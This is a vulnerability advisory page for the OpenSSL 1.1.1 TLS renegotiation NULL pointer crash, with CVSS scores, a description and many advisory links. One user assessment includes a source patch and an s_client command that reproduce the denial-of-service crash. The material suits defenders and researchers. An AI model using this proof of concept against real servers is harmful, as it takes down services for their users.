7.4 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).
Recent assessments:
zeroSteiner at March 26, 2021 2:54pm UTC reported:
The exploitation of this vulnerability would be most easily accomplished using a patched version of OpenSSL to modify the extensions sent within the ClientHello of the renegotiation. Successful exploitation of this vulnerability is likely limited to a Denial of Service condition. Allocating and setting the contents of the NULL page is extremely unlikely from the vantage point of a remote attacker.
The following patch can be applied to OpenSSL 1.1.1k (commit fd78df59) to generate a build capable of reproducing the vulnerability.
index ce8a75794c..3e3f774dab 100644
--- a/ssl/statem/extensions_clnt.c
+++ b/ssl/statem/extensions_clnt.c
@@ -272,7 +272,7 @@ EXT_RETURN tls_construct_ctos_sig_algs(SSL *s, WPACKET *pkt,
return EXT_RETURN_NOT_SENT;
salglen = tls12_get_psigalgs(s, 1, &salg);
- if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
+ if (!WPACKET_put_bytes_u16(pkt, (s->renegotiate ? TLSEXT_TYPE_signature_algorithms_cert : TLSEXT_TYPE_signature_algorithms))
/* Sub-packet for sig-algs extension */
|| !WPACKET_start_sub_packet_u16(pkt)
/* Sub-packet for the actual list */
What this change is doing is swapping the signature_algorithms
extension for signature_algorithms_cert
when the SSL context is renegotiating.
With a patched version of OpenSSL built, run the openssl client, specifying TLS version 1.2 and renegotiate.
echo R | apps/openssl s_client -connect target:443 -msg -tls1_2
Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 4
www.openwall.com/lists/oss-security/2021/03/27/1
www.openwall.com/lists/oss-security/2021/03/27/2
www.openwall.com/lists/oss-security/2021/03/28/3
www.openwall.com/lists/oss-security/2021/03/28/4
cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449
git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148
kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845
kc.mcafee.com/corporate/index?page=content&id=SB10356
lists.debian.org/debian-lts-announce/2021/08/msg00029.html
lists.fedoraproject.org/archives/list/[email protected]/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/
psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013
security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc
security.gentoo.org/glsa/202103-03
security.netapp.com/advisory/ntap-20210326-0006/
security.netapp.com/advisory/ntap-20210513-0002/
tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd
www.debian.org/security/2021/dsa-4875
www.openssl.org/news/secadv/20210325.txt
www.oracle.com//security-alerts/cpujul2021.html
www.oracle.com/security-alerts/cpuApr2021.html
www.oracle.com/security-alerts/cpuoct2021.html
www.tenable.com/security/tns-2021-05
www.tenable.com/security/tns-2021-06
www.tenable.com/security/tns-2021-09
www.tenable.com/security/tns-2021-10
7.4 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N